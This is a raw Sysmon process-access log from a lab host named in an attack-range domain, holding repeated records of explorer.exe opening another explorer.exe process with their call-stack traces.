16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.623{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 